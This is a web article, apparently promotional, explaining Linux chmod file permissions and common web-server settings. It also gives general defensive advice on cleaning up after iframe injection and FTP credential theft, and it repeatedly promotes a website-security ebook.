In the case of a directory, the write permission means you can add, remove, and rename files in the directory. This means that if a file has the write permission bit, you are allowed to modify the file's contents, but you're allowed to rename or delete the file only if the permissions of the file's directory allow you to do so

Execute Access For File:
In the case of a regular file, this means you can execute the file as a program or a shell script
Execute Access For Directory:
On a directory, the execute permission (also called the "search bit") allows you to access files in the directory and enter it, with the cd command, for example. However, note that although the execute bit lets you enter the directory, you're not allowed to list its contents, unless you also have the read permissions to that directory

Every file on your Linux system, including directories, is owned by a specific user and group. Therefore, file permissions are defined separately for users, groups, and others.

Permissions are defined for three types of users:
1) the owner of the file
2) the group that the owner belongs to
3) other users

User Type - USER(u):
The username of the person who owns the file. By default, the user who creates the file will become its owner.
User Type - GROUP(g):
The usergroup that owns the file. All users who belong into the group that owns the file will have the same access permissions to the file. This is useful if, for example, you have a project that requires a bunch of different users to be able to access certain files, while others can't. In that case, you'll add all the users into the same group, make sure the required files are owned by that group, and set the file's group permissions accordingly.
User Type - OTHER(o):
A user who isn't the owner of the file and doesn't belong in the same group the file does. In other words, if you set a permission for the "other" category, it will affect everyone else by default. For this reason, people often talk about setting the "world" permission bit when they mean setting the permissions for "other."

The mode number consists of three octal digits, n1n2n3, representing the access allowed for yourself, for your group (other users set-up on your account), and for everyone else. The value of each digit represents the type of access that is allowed.

Each digit in the mode parameter represents the permissions for a user or a class of users. The first digit corresponds to the owner of the file. The second digit corresponds to the file's group. The final digit corresponds to everybody else.

We can also say that the first digit, n1, on the left, stands for the owner of the file or directory. The middle digit, n2, represents the group who owns the file or directory. The last digit, n3, represents the rest of the world.

Octal---Digit---Permission
000------ 0 --- no permissions enabled
001------ 1 --- execute permission enabled
010------ 2 --- write permission enabled
011------ 3 --- write and execute are both enabled
100------ 4 --- read persmission enabled
101------ 5 --- read and execute are both enabled
110------ 6 --- read and write are both enabled
111------ 7 --- read, write and execute are all enabled

We see from above table that:

1) read is given a value of 4
2) write is given a value of 2
3) execute is given a value of 1

This then is translated by adding the values together for each of the groups of permissions.

For example, let us say the CHMOD is n1n2n3 = 755 = user/group/other; what does this mean:

i) user can read (4), write (2) and execute (1) : 4 + 2 + 1 = 7
ii) group can read (4) and execute (1) : 4 + 0 + 1 = 5
iii) others can read (4) and execute (1) : 4 + 0 + 1 = 5

If the group had the same permissions as the user then we would have 775.

Instead of numbers for the mode, we could also have letters as follows:

1) read = r (4)
2) write = w (2)
3) execute = x (1)
4) not enabled = - (0)

We can then make 755 = rwx r-x r-x
where:
user = rwx
group = r-x
other = r-x

If we had 765 then this would be the same as rwx rw- r-x

You can also see users defined by letters as follows:

1) user = u
2) group = g
3) others = o
4) everybody = a

Usually, only the file owner can change permissions.

Although a shell prompt in a Unix-like environment can be used to do this, an FTP client is often used for such task. Depending on the FTP client being used, CHMOD is usually available through menus or by simply clicking the right mouse button when hovering over a file or directory and choosing the chmod/property option. To set the permissions check the properties or enter the corresponding chmod numbers in the dialogue box.

For more information your can visit the following:

http://www.websiteprotection.net

On a web server, files are usually set to 644. This indicates that the file owner can read and write to the file, while everyone else can only read it. Directories are commonly set to 755. This indicates that the directory owner has full control, while everyone else can read and execute the files within it.

Most common file permissions:

Files: 644
Folders: 755 (with index page in it)
Images: 644
CGI scripts: 755
Php scripts: 644

By default, your public_html ( or public) directory should be rwxr-xr-x (755).
With this setting, if a Web surfer connects to your domain, the server will display either your home page (if a file with the name index.html, index.htm, or index.shtml exists) or a listing of all the files in that directory.

Your other option for your public_html (or public) directory is rwx--x--x (711).
This permission setting will not show a file listing.
If there is no home page, the Web surfer will receive a "Forbidden" error message.

You should take care in setting files CHMOD 777. This basically means anyone can read/write/execute/search the file/directory. In this situation you are leaving your web pages open to the world and making it easy for people to hack your website.

As a owner you need to read, write and execute the files.
As a group certain web server applications or people need to read and execute your files.
As ‘others’, the whole world needs to read and execute your files.

Website Protection Against iFrame Injections

If you have had an iframe injection attack, it is critical that you perform a thorough cleaning of your PC and any other PC that can FTP to your website. The hackers may be attacking your website via a virus that they may have downloaded to your computer without you realizing it. Even though you change passwords, and remove the iframes, you may still be vulnerable to iframe injections.

The virus will take your new passwords and make them available to the hacker. First, it knows the files and default locations of various FTP software, FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password, which is why strong passwords aren't a defense in this case.
Second, the virus may install a keyboard logger. With everyone telling people not to save their FTP username and passwords, hackers started installing keyboard loggers for those who type their passwords in each time. Again, the stolen information is sent to a server that infects the web site.

Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, and send it to a server.

Fourth, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

Depending on the virus on your computer, you may have to install a new anti-virus program. The virus may know how to evade detection of the current anti-virus. It doesn't matter what's being usedcurrently, you may have to install something different.

Once you believe you have removed the iframe injections from your web pages, perform a complete virus scan of your PC before you start to change passwords. This will at least ensure that any new passwords will not be available to the hacker if the virus has been removed.

Use iframe scan tools on a daily basis to check for iframe injection attacks. You can find out more information on the scan tools and how to remove iframe injections by visiting:

http://www.websiteprotection.net

Then, should you have iframe injection again, it probably may not be the result of a faulty script or weak FTP passwords, but the result of a virus on your PC with FTP access to the infected website. You need to remove this virus before creating new passwords.

You can use the following protection methods:
1) Scan and thoroughly clean your PC
2) Change all your FTP passwords
3) Change your hosting and database passwords
4) Check all files for this iframe injection, not just index pages. It could be everywhere you have *body* tag. Use the iframe scan tools daily
5) Check all your .htaccess files, you might find one in every folder, created by this virus. Make sure it is your .htaccess file and has not been modified.
6) Check your web page CHMOD file permissions

When you have fixed your iframe problems, you shouldn't think of it as "I installed security, I'm good now" but rather use it as a way to tightening up the server. You should do that because even the latest software might have some holes in it which can be used.

Website Protection and Security

The growth of the internet has provided website owners with unique business opportunities. Unfortunately, that growth also attracts those who want to steal your website files and sensitive information. As your website grows and it moves to the top ten page ranking on the major search engines, it will also be that much easier for bandits to find your website. They can then easily change your files, damage them or steal them if you do not have website security.

Quite often, when people are creating their website, they tend to forget about adding website protection and security. It is critical that one adds homepage protection and security, as well as, individual web page protection and security.If information security is not implemented in your website design strategy, one can get leeching and hotlinking of important digital files and images, as well as, illegal downloading of your digital products.

If they are selling through a secure website, such as PayPal, they expect this is enough. Unfortunately, this is the wrong attitude to take. Sure, your money may be safe, but it is the loss of potential money that you need to worry about. You must have overall website protection and security to prevent hacking attempts that can download your digital products illegally and cause you loss of income potential. You must add website protection and security if you are to have information security to prevent illegal downloads of all your digital files and images.

Now you can easily learn, on a step-by-step basis with plenty of examples, how to prevent web surfers from purposely or accidentally hacking your website. You will learn how to add powerful website protection and security monitoring tools to hide your product links, minimize website security threats, as well as, advise you on website security issues and the security actions to take.

Your cost to implement this protection is minimal, or in some cases, FREE.

With the amazing ebook: "How To Protect Your Website And Digital Download Products",

you will quickly learn how to retrieve the following security information from your website:

1) Visitor Internet IP address
2) The date and time your visitors arrived at your website
3) The domain or web page that your visitors came from to access your web pages
4) The total number of your product downloads5) Any illegal product downloads

Visit:

http://www.websiteprotection.net

to get a Free Preview of this amazing ebook.

You will learn how to stop hotlinking and leeching of your digital download products in order to get internet website protection and security. Is getting hacked a risk you can afford to take? It could cost you and your business, ten's of thousands of dollars. Website security is a critical component of the success of any web based business.

You will also learn how to detect and fight against iframe injections. An iframe injection is an injection of one or more iframe tags into a page's content. The iframe typically does something bad, such as downloading an executable application that contains a virus or worm in it… something that compromises a visitor's system. Iframe injection can cause your website to be flagged by the major search engines, such as Google, as being a "bad" site because it is hosting "malware". When your site appears on the search page, it will be marked with a note indicating visitors could be at risk if they continue to your website. This could essentially remove all traffic to your site causing you thousands of dollars in lost revenue.

There are plenty of people on the internet trying to sell you high price security along with monthly fees, but none tell you about the security features that are readily availabe to you on the internet involving minimum or no costs to you.

Whatever... let "How To Protect Your Website And Digital Product Downloads" help you come up with the best economical security for your Website.

This ebook will help you learn the secrets that the security gurus do not want you to know, without wasting your time searching for information scattered all over the internet. Time is a precious commodity and you need to use it wisely.

Go now to:

http://www.websiteprotection.net

Once you have the secrets, you can quickly protect and secure your website from hackers and illegal downloading of your products.
Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.